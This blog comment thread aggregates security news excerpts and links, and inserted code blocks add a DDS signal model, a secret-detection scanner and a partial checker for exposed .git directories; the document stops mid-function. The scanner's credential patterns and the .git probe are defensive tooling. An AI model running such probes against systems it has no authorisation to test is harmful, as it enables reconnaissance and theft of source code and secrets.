  8. Tomi Engdahl says:

    Low-Cost, Two-Channel Scriptable Waveform Generator
    https://hackaday.com/2022/03/05/low-cost-two-channel-scriptable-waveform-generator/

    Microcontroller addict [Debraj] decided to make his own programmable sine wave generator, and was able to put it together for under $40 USD. Other than low-cost, his list of requirements was as follows:

    Dual sine wave output, synchronized
    Frequency, Amplitude, and Phase control
    Low harmonics under 1 MHz
    Scriptable via Python

    The heart of the project is the Analog Devices AD9833, a complete Direct Digital Synthesis (DDS) waveform generator system on a chip. If you’ve ever rolled your own DDS using discrete ICs or in an FPGA, you can appreciate the benefit of squeezing the phase accumulator, sine lookup table, DAC, and control logic all into a single ten-pin package. [Debraj] uses AD9833 modules from the usual online vendors for a few dollars each. He synchronizes the generators by disconnecting the reference crystal on the second module and driving it from the first one. The remaining specifications are met by the inherent characteristics of the DDS system, and the scriptable interface is accomplished with an Arduino controlling the AD9833 chips and two programmable gain amplifiers (MCP6S31). We like the confidence that [Debraj] displays by sketching the initial circuit diagram with a ball-point pen — check out the sketch and the final pictorial schematic in the video below the break.

    Low Cost DIY Dual Sine Wave generator
    https://www.youtube.com/watch?v=ODtvqU939jw

    1. Low Cost DIY Dual Sine Wave generator
    2. Programmable frequency, phase and amplitude
    3. Frequency (low harmonics) from 1 Hz to 1 MHz
    4. Phase 0 deg to 360 deg
    5. 7-step amplitude change.
    6. Simple commands, which can be sent via a terminal program or a Python script.
    7. Applications — Quadrature Amplitude Modulation, DSP (filters, FFT), PLL, arctan algorithm validation, Clarke-Park Transform and many more.

    Reply
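The comment above describes the DDS building blocks the AD9833 integrates (phase accumulator, sine lookup table, DAC, phase register) and why driving both modules from one reference keeps the two channels locked. The following software model of that chain is an added illustration for this thread, not code from the Hackaday article or from [Debraj]'s project. Register widths follow the AD9833 datasheet (28-bit frequency word, 12-bit phase word, 10-bit DAC); the 25 MHz master clock and the 256-entry lookup table are assumptions made for the model.

```python
"""Software model of the AD9833-style direct digital synthesis (DDS) chain.

Added illustration, not code from the Hackaday article or from [Debraj]'s
project. Register widths follow the AD9833 datasheet (28-bit frequency word,
12-bit phase word, 10-bit DAC). The 25 MHz master clock and the 256-entry sine
table are assumptions made for this model.
"""
import math

FREQ_BITS = 28        # phase accumulator / frequency register width (AD9833)
PHASE_BITS = 12       # phase offset register width (AD9833)
DAC_BITS = 10         # DAC resolution (AD9833)
LUT_BITS = 8          # assumed: 256-entry sine table addressed by the accumulator's top bits
F_MCLK = 25_000_000   # assumed master clock in Hz

ACC_MASK = (1 << FREQ_BITS) - 1
# Unsigned sine table scaled to the DAC range 0..1023.
SINE_LUT = [
    round((math.sin(2 * math.pi * i / (1 << LUT_BITS)) + 1.0) / 2.0 * ((1 << DAC_BITS) - 1))
    for i in range(1 << LUT_BITS)
]


def freq_word(f_out_hz, f_mclk_hz=F_MCLK):
    """Tuning word for f_out: f_out = f_mclk * word / 2**28, so the step is f_mclk / 2**28."""
    word = round(f_out_hz * (1 << FREQ_BITS) / f_mclk_hz)
    if not 0 <= word <= ACC_MASK:
        raise ValueError("frequency out of range for a 28-bit tuning word")
    return word


def actual_freq(word, f_mclk_hz=F_MCLK):
    """Frequency really produced by a tuning word (exposes the quantisation error)."""
    return f_mclk_hz * word / (1 << FREQ_BITS)


def phase_word(degrees):
    """12-bit phase offset: 360 degrees span 2**12 codes."""
    return round((degrees % 360.0) * (1 << PHASE_BITS) / 360.0) % (1 << PHASE_BITS)


class DDSChannel:
    """One generator: accumulator -> phase offset -> sine LUT -> DAC code."""

    def __init__(self, f_word, p_word=0):
        self.f_word = f_word
        self.p_word = p_word
        self.acc = 0

    def step(self):
        """Advance by one master-clock tick and return the 10-bit DAC code."""
        self.acc = (self.acc + self.f_word) & ACC_MASK
        # The 12-bit phase register is added aligned to the accumulator's most significant bits.
        phase = (self.acc + (self.p_word << (FREQ_BITS - PHASE_BITS))) & ACC_MASK
        return SINE_LUT[phase >> (FREQ_BITS - LUT_BITS)]


def generate(f_word, phase_a_deg, phase_b_deg, n_samples):
    """Two channels clocked from one source, so they stay locked and differ only in phase."""
    a = DDSChannel(f_word, phase_word(phase_a_deg))
    b = DDSChannel(f_word, phase_word(phase_b_deg))
    return [(a.step(), b.step()) for _ in range(n_samples)]


if __name__ == "__main__":
    w = freq_word(1000.0)
    print(f"tuning word {w} -> {actual_freq(w):.4f} Hz (resolution {actual_freq(1):.4f} Hz)")
    for code_a, code_b in generate(1 << 20, 0, 90, 4):
        print(code_a, code_b)
```

With the tuning word 1 << 20 the table index advances by exactly one per clock, so a 90-degree phase word shifts channel B by a quarter period (64 samples) relative to channel A; that is the quadrature relationship the comment lists under applications.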
  9. Tomi Engdahl says:

    How Everything We’re Told About Website Identity Assurance is Wrong
    https://www.troyhunt.com/how-everything-were-told-about-website-identity-assurance-is-wrong/

    I have a vehement dislike for misleading advertising. We see it every day; weight loss pills, make money fast schemes and if you travel in the same circles I do, claims that extended validation (EV) certificates actually do something useful

    Someone had reached out to me privately and shared the offending page as they’d taken issue with the false claims DigiCert was making. My views on certificate authority shenanigans spinning yarns on EV are well known after having done many talks on the topic and written many blog posts, most recently in August 2019 after both Chrome and Firefox announced they were killing it. When I say “kill”, that never meant that EV would no longer technically work, but it killed the single thing spruikers of it relied upon – being visually present beside the address bar. That was 2 and a half years ago, so why is DigiCert still pimping the message about the green bar with the company name? Beats me (although I could gue$$), but clearly DigiCert had a change of heart after that tweet because a day later, the offending image was gon

    Reply
  10. Tomi Engdahl says:

    Duncan Riley / SiliconANGLE:
    Cloudflare, CrowdStrike, and Ping Identity form the Critical Infrastructure Defense Project, offering their services to US hospitals and utilities for free — Cloudflare Inc., CrowdStrike Holdings Inc. and Ping Identity Corp. today are teaming up to form the Critical Infrastructure Defense Project …

    Cloudflare, CrowdStrike and Ping Identity to provide free cybersecurity to vulnerable industries
    https://siliconangle.com/2022/03/07/cloudflare-cloudstrike-ping-identity-provide-free-cybersecurity-vulnerable-industries/

    Cloudflare Inc., CrowdStrike Holdings Inc. and Ping Identity Corp. today are teaming up to form the Critical Infrastructure Defense Project, a project that will provide free cybersecurity services to vulnerable industries.

    The project is designed to enhance defenses against critical areas of enterprise risk. Under the project, eligible organizations will have access to the full suite of Cloudflare zero-trust security solutions, endpoint protection and intelligence services from CrowdStrike and zero-trust identity solutions from Ping Identity.

    In addition, in collaboration with core partners across the public sector, the project will also offer an easy-to-follow roadmap that businesses in any industry can use to implement step-by-step security measures to defend themselves from cyberattacks.

    https://criticalinfrastructuredefense.org/

    Reply
  11. Tomi Engdahl says:

    Duncan Riley / SiliconANGLE:
    Cloudflare, CrowdStrike, and Ping Identity form the Critical Infrastructure Defense Project, offering their services to US hospitals and utilities for free

    Cloudflare, CrowdStrike and Ping Identity to provide free cybersecurity to vulnerable industries
    https://siliconangle.com/2022/03/07/cloudflare-cloudstrike-ping-identity-provide-free-cybersecurity-vulnerable-industries/

    Cloudflare Inc., CrowdStrike Holdings Inc. and Ping Identity Corp. today are teaming up to form the Critical Infrastructure Defense Project, a project that will provide free cybersecurity services to vulnerable industries.

    The project is designed to enhance defenses against critical areas of enterprise risk. Under the project, eligible organizations will have access to the full suite of Cloudflare zero-trust security solutions, endpoint protection and intelligence services from CrowdStrike and zero-trust identity solutions from Ping Identity.

    The security features available to organizations through the Critical Infrastructure Defense Project provide a zero-trust model for securing networks, endpoints and identities of organizations and critical threat intelligence for teams at risk of attack. Hospitals and water and power utilities in the U.S. are encouraged to apply to be part of the program.

    The timing of the project comes as the Russian invasion of Ukraine continues and, alongside that, a rise in hacking and cyberattacks. The Department of Homeland Security’s Cybersecurity and Infrastructure Agency has issued multiple warnings about Russia targeting businesses.

    Last month, CISA warned that Russian state-sponsored cyber actors were targeting defense contractors. In January, CISA warned that Russia could launch cyberattacks against the U.S. government and critical infrastructure operators ahead of the Ukraine invasion.

    “We rely on our infrastructure to power our homes, to provide access to water and basic necessities and to maintain critical access to healthcare,” Matthew Prince, co-founder and chief executive officer of Cloudflare, said in a statement. “That’s why it’s more important than ever for the security industry to band together and ensure that our most critical industries are protected and prepared.”

    Reply
  12. Tomi Engdahl says:

    Webinar Today: Protect the Software Supply Chain, Eliminate Risks in Code
    https://www.securityweek.com/webinar-today-protect-software-supply-chain-eliminate-risks-code

    Software supply chain attacks have become a boardroom topic as organizations grapple with growing cyberattacks and skyrocketing costs of remediation.

    Please join SecurityWeek and BluBracket on Tuesday, March 8, 2022 at 1:00PM ET for an exclusive webinar: Eliminate Risks in Code, Protect the Software Supply Chain.

    Developers and security professionals can benefit from this webinar and hear from DevSecOps experts on how leading organizations are shifting left, utilizing new techniques to identify and mitigate risks without slowing down the process.

    Key takeaways from this webinar:

    ● Discover how to detect secrets in code and rectify other critical code related risks.

    ● Uncover new techniques that protect code in both internal and external repositories.

    ● Learn about the latest code security tools that support AppSec programs, integrate with existing developer workflows and even secure Git and infrastructure configurations.

    Reply
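The first takeaway of the webinar above is detecting secrets in code. The scanner below is an added example written for this thread, not BluBracket's or SecurityWeek's tooling. It combines three detectors: known-format patterns (AWS access key ID, PEM private key header), credential-looking assignments with a quoted literal, and high-entropy string literals. The 4.0 bits/character entropy threshold and the placeholder word list are assumed tuning values; SAMPLE_SOURCE is constructed for the demo, and AKIAIOSFODNN7EXAMPLE is the example key ID used in AWS documentation, not a live credential.

```python
"""Minimal secret scanner for source text.

Added example written for this thread; it is not BluBracket's or SecurityWeek's
tooling. Detectors: exact-format patterns, credential assignments, and
high-entropy literals. The 4.0 bits/char threshold and the placeholder list are
assumed tuning values. SAMPLE_SOURCE is constructed; AKIAIOSFODNN7EXAMPLE is the
example key ID from AWS documentation, not a live credential.
"""
import math
import re
from dataclasses import dataclass
from typing import List


@dataclass
class Finding:
    line_no: int
    rule: str
    snippet: str


PATTERN_RULES = {
    "aws-access-key-id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private-key-pem": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}
# An identifier containing a credential word, assigned a quoted literal of 6+ characters.
ASSIGN_RULE = re.compile(
    r"""(?i)\b\w*(password|passwd|secret|api[_-]?key|token)\w*\s*[:=]\s*["']([^"']{6,})["']"""
)
# A quoted literal of 20+ base64/hex-like characters: candidate for the entropy test.
STRING_LITERAL = re.compile(r"""["']([A-Za-z0-9+/=_\-]{20,})["']""")
PLACEHOLDER_TOKENS = ("changeme", "example", "placeholder", "xxxx", "${", "<your")


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character, estimated from the character frequencies of s."""
    if not s:
        return 0.0
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def is_placeholder(value: str) -> bool:
    """Suppress obvious dummies so the report is not flooded with 'changeme' noise."""
    low = value.lower()
    return any(tok in low for tok in PLACEHOLDER_TOKENS)


def scan(text: str, entropy_threshold: float = 4.0) -> List[Finding]:
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        snippet = line.strip()
        for rule, rx in PATTERN_RULES.items():
            if rx.search(line):
                findings.append(Finding(no, rule, snippet))
        m = ASSIGN_RULE.search(line)
        if m and not is_placeholder(m.group(2)):
            findings.append(Finding(no, "credential-assignment", snippet))
        for literal in STRING_LITERAL.findall(line):
            # Skip literals already covered by an exact-format rule; then apply the entropy test.
            if any(rx.fullmatch(literal) for rx in PATTERN_RULES.values()):
                continue
            if shannon_entropy(literal) >= entropy_threshold:
                findings.append(Finding(no, "high-entropy-string", snippet))
    return findings


# Constructed sample input for the demo (not a real source file).
SAMPLE_SOURCE = """\
import os
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
db_password = "changeme"
api_key = "q7Zp3xW9LmT2vB8nK4sY6dF1gH5jR0c"
token = os.environ["API_TOKEN"]
-----BEGIN RSA PRIVATE KEY-----
greeting = "hello world"
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_SOURCE):
        print(f"line {f.line_no}: {f.rule}: {f.snippet}")
```

Reading the secret from `os.environ` on line 5 of the sample produces no finding, which is the pattern a scanner should steer developers toward; the placeholder filter is what keeps the noise down, and it should be tuned per code base rather than trusted blindly.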
  13. Tomi Engdahl says:

    Cyber security preparedness is done while the weather is good – guidance for organisations https://www.kyberturvallisuuskeskus.fi/fi/ajankohtaista/kyberturvallisuuden-varautuminen-tehdaan-hyvan-saan-aikaan-ohje-organisaatioille
    The cyber security situation in Finland is currently stable.
    Communications networks are operating normally and telecom operators have long experience of preparedness. The possible knock-on effects of the tense international situation on information security are now worrying many organisations. A well-organised information security foundation is an investment in securing the continuity of the organisation's operations every day. Preparedness should be done before exceptional situations arise.
    “For example, almost all of the cyber events seen in Ukraine over the last ten years have also been seen, experienced and repelled in Finland. This demonstrates the level of Finland's cyber security expertise and preparedness,” says Director Arttu Lehmuskallio of the National Cyber Security Centre at the Finnish Transport and Communications Agency Traficom. Guidance:
    https://www.kyberturvallisuuskeskus.fi/fi/kyberturvallisuuden-vahvistaminen-suomalaisissa-organisaatiossa-ohje-johdolle-ja-asiantuntijoille

    Reply
  14. Tomi Engdahl says:

    EU countries to call for the establishment of a cybersecurity emergency fund https://www.euractiv.com/section/cybersecurity/news/eu-countries-to-call-for-the-establishment-of-a-cybersecurity-emergency-fund/
    European governments have drafted a declaration to reinforce the EU’s cybersecurity capacities, including establishing a new fund and increasing EU funding to support national efforts. The joint call will be adopted on Wednesday (9 March) in an informal meeting of telecommunications ministers organised by the French Presidency in Nevers. The schedule of the summit was reshuffled entirely to address the Ukrainian conflict.

    Reply
  15. Tomi Engdahl says:

    Cyber security is also a women's issue
    https://impulssilvm.fi/2022/03/08/kyberturvallisuus-on-myos-naisten-asia/
    On this Women's Day, security as a theme is even more meaningful than before. My own thoughts are especially with the women and girls of Ukraine, those who have found themselves in the middle of a shocking war.
    Enormous fear, grief and worry for loved ones and for one's own home shake life to its foundations. For them, a sense of security is a distant thing.
    Looking more closely at the sense of security, it is in fact a privilege as a feeling, one made up of many different components.
    Security is a theme that has run like a red thread through my career. The theme is meaningful to me not only from the perspective of security policy but also from that of the psychological security that touches individuals and communities. Cyber security is about both.

    Reply
  16. Tomi Engdahl says:

    Joseph Cox / VICE:
    Twitter launches a Tor onion service using a modified version of the Enterprise Onion Toolkit, letting users access Twitter via any Tor-compatible browser — The site may become the most significant onion service created if it allows people to access Twitter from censored countries. — Joseph Cox

    Twitter Launches Tor Onion Service Making Site Easier to Access in Russia
    https://www.vice.com/en/article/v7dqxd/twitter-tor-onion-service-dark-web-version

    The site may become the most significant onion service created if it allows people to access Twitter from censored countries.

    Reply
  17. Tomi Engdahl says:

    The Psychology of Ransomware Response
    https://www.securityweek.com/psychology-ransomware-response

    The human response to cyber crises is not something that can be bought off a shelf and installed over the weekend. On average, it takes 96 days for a human to develop the knowledge, skills and judgment to defend against breaking threats – and that is too long during times of heightened threat.

    Immersive Labs provides a platform designed to raise the cyber capabilities of a company’s entire workforce. “We’ve been operational since 2017,” the company told SecurityWeek, “and have collected a weighty amount of data – 2,100 organizations, 500,000 cybersecurity exercises at either our labs or via a crisis simulator looking at 1,500 separate threats or incidents, which could be anything from ransomware to SOC teams looking at specific malware.”

    A Cyber Workforce Benchmark 2022 report (PDF) has analyzed the exercises and simulations. The results show that the technology and financial services sectors spend the most time on preparing the workforce for cyber incidents – with other critical infrastructure companies preparing the least.

    https://cms.immersivelabs.com/content/uploads/2022/03/cyber-workforce-benchmark-2022–immersive-labsfinal.pdf

    Reply
  18. Tomi Engdahl says:

    Talking About Cybersecurity and Cell Phones
    Feb. 28, 2022
    Alex Leadbeater, ETSI TC CYBER Chair, discusses the organization’s new standard focusing on cybersecurity and cell phones.
    https://www.electronicdesign.com/technologies/iot/video/21215825/electronic-design-talking-about-cybersecurity-and-cell-phones?utm_source=EG%20ED%20Connected%20Solutions&utm_medium=email&utm_campaign=CPS220225025&o_eid=7211D2691390C9R&rdx.ident%5Bpull%5D=omeda%7C7211D2691390C9R&oly_enc_id=7211D2691390C9R

    Defining security and assurance requirements for smart phones and tablets, ETSI recently released the “Consumer Mobile Device Protection Profile, ETSI TS 103 732” specification, which identifies key security and privacy risks for user data and appropriate protection. The ETSI standard specifies security requirements for consumer mobile devices, ensuring protection of key user data. We speak to Alex Leadbeater, ETSI TC CYBER Chair, about this initiative.

    The ETSI specification covers security features such as cryptographic support, user data protection, identification and authentication, security management, privacy protection, resistance to physical attack, secure boot, and trusted communication channels. ETSI TS 103 732 defines security assurance requirements and is suitable for certification initiatives such as the European Cybersecurity Act, offering a common methodology for evaluators to assess the security of consumer mobile devices.

    Reply
  19. Tomi Engdahl says:

    Security Leaders Find Value in Veterans to Solve Cyber Skills Shortage
    https://www.securityweek.com/veterans-cyberspace-underused-resource

    CISOs struggling to fill their vacancies should take a closer look at the opportunities afforded by military veterans

    While the cyber skills gap is not a new problem, it is persistent. CISOs are forced to be determined and imaginative in their approach to finding and recruiting new cybersecurity talent, and it is very hard. But there is a skills resource that remains largely underutilized: the military veteran.

    This is the view of Jordan Mauriello, CSO at MDR firm Critical Start, and his CEO Rob Davis. Both are vets – and around 30% of the staff at Critical Start are also vets. “Being vets ourselves,” Mauriello told SecurityWeek, “doesn’t simply give us a greater proclivity to employ vets, it gives us an understanding of the value that a lot of vets can bring to cyber.”

    He is critical of much of the current system of cyber training. “A lot of the universities and training organizations are deficient in providing the skills, and especially the real-world experience, that makes the difference between a security technician and a security theorist.” He believes both skills and experience can be found among the ranks of vets.

    The parallels between military and cyber

    Vets are immediately at home in cyberspace. “Insurgency is asymmetric warfare,” said Mauriello, “and cyber is often described as an asymmetric battleground.”

    Cyber defenders have defense in depth against thousands of potential attackers, but it takes just one attacker to breach them just once. Just like the military must be on guard and effective without knowing where or how an insurgent might strike, so must a cyber defender do the same. In fact, it’s worse in cyber. If an insurgent fails against the military, there is usually a cost. In cyber, the attacker can continually try and fail until he succeeds with effectively no cost.

    The ability and willingness to learn new skills is also common to both spheres. “A fundamental part of military life is continuous training,” said Mauriello. “You are always training, and it never stops. You train, you deploy, and then you come back and start training for the next deployment. That’s the military lifecycle. In security where it is constantly changing and the attackers are always doing something new, you must always be learning those new things. That’s just normal life for the military, which vets have been doing for years. Already, they’re jumping into a lifestyle and work ethic they understand. It’s just new knowledge and new skills they must learn.”

    There are other advantages to employing vets, such as the military’s rules of engagement. Vets understand exactly what they can and cannot do. In an age of continuous hack back debate, this is a valuable check. And they also know and understand that attackers don’t constrain themselves to a 9-till-5 operational period. Vets are likely to be more ready to respond to an incident at any time than the newly graduated university student.

    Reply
  20. Tomi Engdahl says:

    https://www.facebook.com/100068963182988/posts/274367674872003/

    Ways to connect when authorities block services:
    * Unblock YouTube grants you access to any blocked web page – https://m.proxfree.com
    * Web Proxy — is an intermediate point between your computer and the needed website. – https://hidemy.name/en/
    * Use ProxMate. This is an add-on for the Mozilla Firefox or Chrome web browser. – https://proxmate.me
    * DNS provider that is open and democratic – https://www.opennic.org
    * Android: Circumvent Internet restrictions with Tor – https://cyberguerrilla.org/android-circumvent-net-blocking-with-tor.htm
    * Android users-
    * https://play.google.com/store/apps/details?id=com.psiphon3
    * Apple users – http://download.cnet.com/Free-VPN-Onavo-Protect/3000-2064_4-75893697.html
    * Google browser – https://chrome.google.com/webstore/detail/zenmate-vpn-best-cyber-se/fdcgdnkidjaadafnichfpabhfomcebme
    * Firefox users – https://addons.mozilla.org/en-US/firefox/addon/anonymox/
    * List of DNS servers that can be used to avoid censorship – https://www.lifewire.com/free-and-public-dns-servers-2626062
    * How Do I Change DNS Servers? – https://www.lifewire.com/how-to-change-dns-server-settings-2617979
    * Tor Browser – https://www.torproject.org/download/download-easy.html.en
    * What is the Tor Browser? – https://www.torproject.org/projects/torbrowser.html.en

    InviZible Pro includes well-known modules such as DNSCrypt, Tor and Purple I2P https://invizible.net/en/

    In case it is needed: Dial up internet access VPN Jabber … http://www.cisco.com/c/dam/en/us/products/collateral/security/asa-5500-series-next-generation-firewalls/guide_c07-717020.pdf

    Alternate DNS – https://wikileaks.org/wiki/Alternative_DNS/de

    Stay Anonymous- https://www.whonix.org

    General router DNS setup(recommended) – http://support.smartdnsproxy.com/customer/portal/articles/1558303-general-router-dns-setup-smart-dns-proxy

    Express VPN https://www.expressvpn.com/support/vpn-setup/manual-config-for-dd-wrt-router-with-openvpn/

    Anonymity Script- https://github.com/HiroshiManRise/anonym8

    Secure your wifi- https://www.pcmag.com/article2/0,2817,2409751,00.asp

    Stop your internet provider from tracking you – http://www.pcworld.com/article/3184767/security/three-privacy-tools-that-block-your-internet-provider-from-tracking-you.html

    VPN GATE client for linux – https://github.com/Dragon2fly/vpngate-with-proxy

    HIDING TOR FROM YOUR ISP – PART 1 – BRIDGES AND PLUGGABLE TRANSPORTS- https://www.deepdotweb.com/jolly-rogers-security-guide-for-beginners/hiding-tor-from-your-isp-part-1-bridges-and-pluggable-transports/

    TOR Bridges- https://www.torproject.org/docs/bridges

    Reply
  21. Tomi Engdahl says:

    Security and the Peter Principle – Seven Signs That You Are Working for a “Peter”
    https://www.securityweek.com/security-and-peter-principle-seven-signs-you-are-working-peter

    Seven signs that you are working for a “Peter” and how you can adjust how you work to compensate

    Laurence J. Peter was a Canadian educator and author who was perhaps most well known for his famous book “The Peter Principle”. In his book, Peter and co-author Raymond Hull explain the Peter principle, which “observes that people in a hierarchy tend to rise to ‘a level of respective incompetence’: employees are promoted based on their success in previous jobs until they reach a level at which they are no longer competent, as skills in one job do not necessarily translate to another.” (source). Since then, the Peter principle has become widely known and has been a favorite topic of discussion.

    As a professional discipline, security is not immune to the Peter principle. I’m sure you’ve experienced it over the course of your career just as much as I have over the course of mine. While we may not be able to fix the organizational issues created by a “Peter”, by identifying the signs that we are working for one, we can often adjust how we work to compensate.

    In this spirit, I offer seven signs that you are working for a “Peter” and how you can adjust how you work to compensate:

    1. Inability to think and plan strategically: When a strong security leader has a handle on their work responsibilities and understands the business, domain, and organization in which they work, that leader will be able to think and plan strategically. They will be able to set goals and priorities to ensure that strategic initiatives go from conception to implementation. They will also be able to delegate appropriately, with the ability to monitor and track progress without the need to micromanage.

    2. Running from crisis to crisis: Perhaps one of the most widely seen symptoms of not being methodical and strategic is the tendency to run from crisis to crisis. Some of the best managers I’ve had over the course of my career have been able to see an issue before anyone else and navigate the team towards pre-empting it.

    3. Hesitance to put anything in writing: A common defense mechanism of a “Peter” is to avoid putting anything in writing. After all, when something goes wrong and it is time for a person or a team to take responsibility, written accounts are important. If there is nothing in writing, the situation quickly becomes a game of “he said, she said”.

    4. Does not make tough decisions: Decision making, or at least timely and responsible decision making, is not easy at all. The “Peter”, realizing that they are in over their head, will not be able to make decisions, and in particular, tough decisions. The reason for this is simple: there exists the possibility of making the wrong decision and thus being held accountable for that wrong decision.

    5. Does not answer tough questions: Answering tough questions is almost as difficult as making tough decisions. I have found over the course of my career that colleagues overwhelmingly prefer direct, open, and transparent answers, even if they are not the answers they were hoping to hear. A “Peter” won’t give a straight answer.

    6. Words and actions don’t align: We have all worked with people who say one thing and do another. This is especially the case with a “Peter”. When tough decisions are hard to make and tough answers are hard to communicate, the “Peter” may resort to pleasing the crowd, almost in a populist fashion. While it may tame the crowd in the near-term, in the long-term, it always catches up with the “Peter” and their team.

    7. Poor communication skills: If you can’t fully understand something, don’t have a plan, and don’t have any answers, that renders effective communication nearly impossible. This is something routinely encountered by customers, executives, team members, and other stakeholders when a “Peter” is involved. Unfortunately, this causes a loss of confidence and trust in both the “Peter” and the team.

    Reply
  22. Tomi Engdahl says:

    Security Guidance 2022-01 – Cybersecurity mitigation measures against critical threats https://media.cert.europa.eu/static/WhitePapers/TLP-WHITE-CERT-EU_Security_Guidance-22-001_v1_0.pdf
    [...] this surge of US personnel in October and November was different: it was in preparation of impending war. People familiar with the operation described an urgency in the hunt for hidden malware, the kind which Russia could have planted, then left dormant in preparation to launch a devastating cyber attack alongside a more conventional ground invasion. On February 14, ENISA and CERT-EU made a joint publication strongly encouraging all EU-based organisations to implement a set of cybersecurity best practices. Building on this joint publication, CERT-EU is making available the following specific implementation recommendations. By applying these systematically, organisations can boost their cybersecurity defence and resilience.
    This would allow them to: improve their cybersecurity posture to fend off a wide range of attacks and limit the number of cybersecurity incidents; and detect and react to cyber operations that may be carried out by sophisticated threat actors.

    Reply
  23. Tomi Engdahl says:

    Securing healthcare: An IT health check on the state of the sector https://www.welivesecurity.com/2022/03/09/securing-healthcare-it-health-check-state-sector/
    There’s far more than just money at stake: a 2019 study claimed that even data breaches can increase the 30-day mortality rate for heart attack victims. Indeed, while a now-infamous ransomware incident in Germany is not thought to have directly caused the death of a patient, it was one of the potent harbingers of the potential real-world impact of virtual attacks, when life-saving systems are taken offline. As European healthcare organizations (HCOs) continue to digitalize in response to the pressures of COVID-19, an increasingly remote workforce and an ageing population, these risks will only grow. But by building cyber-resilience through improved IT hygiene and other best practices, and enhancing incident detection and response, there is a way forward for the sector.

    Reply
  24. Tomi Engdahl says:

    EU governments call on online platform to scale up fact-checking efforts https://www.euractiv.com/section/digital/news/ukraine-les-27-exhortent-google-meta-et-twitter-de-passer-a-la-vitesse-superieure/
    EU telecoms ministers have urged digital companies to ensure their anti-disinformation capacity is adequate in Central Eastern Europe, a primary target of Russian hybrid warfare. EU governments gathered in France for an informal meeting on Tuesday (8 March) to discuss how to counter online disinformation from the Kremlin, following the Russian aggression of Ukraine almost two weeks ago. Representatives from Google, YouTube, Meta and Twitter were invited to the discussion.

    Reply
  25. Tomi Engdahl says:

    Mobile Malware is Surging in Europe: A Look at the Biggest Threats https://www.proofpoint.com/us/blog/email-and-cloud-threats/mobile-malware-surging-europe-look-biggest-threats
    Starting in early February, our researchers detected a 500% jump in mobile malware delivery attempts in Europe. This is in keeping with a trend we’ve observed over the past few years where mobile messaging abuse has steadily increased as attackers ramp up attempts at smishing (SMS/text-based phishing) and sending malware to mobile devices. In 2021 alone, we detected several different malware packages across the globe. Although volume fell sharply toward the end of 2021, we’re seeing a 2022 resurgence.

    Reply
  26. Tomi Engdahl says:

    February 2022’s Most Wanted Malware: Emotet Remains Number One While Trickbot Slips Even Further Down the Index https://blog.checkpoint.com/2022/03/09/february-2022s-most-wanted-malware-emotet-remains-number-one-while-trickbot-slips-even-further-down-the-index/
    Check Point Research (CPR) reveals that Emotet is again the most prevalent malware, while Trickbot falls from second place into sixth.
    Apache Log4j is no longer the most exploited vulnerability but Education/Research is still the most attacked industry. This month Education/Research continues to be the most attacked industry globally followed by Government/Military and Internet service provider (ISP) / managed service provider (MSP). “Web Server Exposed Git Repository Information Disclosure” is the most commonly exploited vulnerability, impacting 46% of organizations globally, followed by “Apache Log4j Remote Code Execution” which dropped from first to second place and impacts 44% of organizations worldwide. “HTTP Headers Remote Code Execution” is the third most exploited vulnerability, with a global impact of 41%.

    Emotet Redux
    https://blog.lumen.com/emotet-redux/
    Since its reemergence on Nov. 14, 2021, Black Lotus Labs has once again been tracking Emotet, one of the world’s most prolific malware distribution families which previously infected more than 1.6M devices and caused hundreds of millions of dollars in damage across critical infrastructure, healthcare, government organizations and enterprises around the world. Using our global visibility, we have determined that while Emotet has not yet attained the same scale it once had, the botnet is showing a strong resurgence with a total of approximately 130,000 unique bots spread across 179 countries since November 2021.
    This growing pool of bots presents a looming threat to organizations around the world; Emotet bots serve to not only propagate the malware by spamming targets through legitimate mail servers using stolen credentials, but they also serve as footholds for lateral movement in coveted networks and could be promoted to act as proxy C2s.

    Reply
  27. Tomi Engdahl says:

    8 Top Git Security Issues & What To Do About Them https://blog.checkpoint.com/2022/03/08/8-top-git-security-issues-what-to-do-about-them/
    Git is the most popular software version control (SVC) standard used by developers today. That doesn’t make it the most secure. Whether you’re using GitLab, GitHub, or a locally hosted Git server; there are many security issues that can sneak up on you and start a snowball effect of unpleasant repercussions. At its core, Git is not built for security but for collaboration. As such, it is not secure but can be made secure through the use of tools and best practices. In this post, we’ll review just how secure Git is (or rather isn’t). We will demonstrate why and how serious Git security issues can be. Then, we’ll list the eight most common Git security issues, and what you can do about them.

    Reply
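The "Web Server Exposed Git Repository Information Disclosure" finding in the Check Point statistics two comments up, and the Git security issues article above, come down to the same mistake: a deployed working tree that leaves `.git/` reachable over HTTP, from which an attacker can reconstruct source and any committed secrets. The following checker is an added example written for this page, not code from Check Point or from any of the linked articles. It probes the two files Git always writes (`HEAD` and `config`) and validates their content instead of trusting a 200 status, because servers that answer every path with an HTML page (soft 404s) otherwise produce false positives. The `fetch` callable is injected so the check runs offline here; the hostnames and responses in `SAMPLE_SITES` are constructed.

```python
"""Added example: detect a web server that exposes its .git directory.

Not code from Check Point or the linked articles. The sample responses
and hostnames below are constructed; the fetcher is injected so the
check can run offline and so callers can add timeouts, auth and rate
limiting as they see fit.
"""
import re
from typing import Callable, Dict, Optional
from urllib.parse import urljoin

# A real .git/HEAD is either a symbolic ref or a bare 40-hex SHA-1.
_HEAD_RE = re.compile(r"^(ref: refs/[^\s]+|[0-9a-f]{40})\s*$")
# A real .git/config starts with the [core] section.
_CONFIG_RE = re.compile(r"^\s*\[core\]", re.MULTILINE)

# Files present in every repository, so their absence is conclusive.
PROBE_PATHS = ("/.git/HEAD", "/.git/config")


def looks_like_git_head(body: str) -> bool:
    return bool(_HEAD_RE.match(body.strip()))


def looks_like_git_config(body: str) -> bool:
    return bool(_CONFIG_RE.search(body))


def check_exposed_git(base_url: str,
                      fetch: Callable[[str], Optional[str]]) -> Dict[str, bool]:
    """Probe base_url for an exposed .git directory.

    fetch(url) returns the body as text for an HTTP 200 and None for
    anything else. Content is validated, not just the status code.
    """
    results: Dict[str, bool] = {}
    for path in PROBE_PATHS:
        body = fetch(urljoin(base_url, path))
        if body is None:
            results[path] = False
        elif path.endswith("HEAD"):
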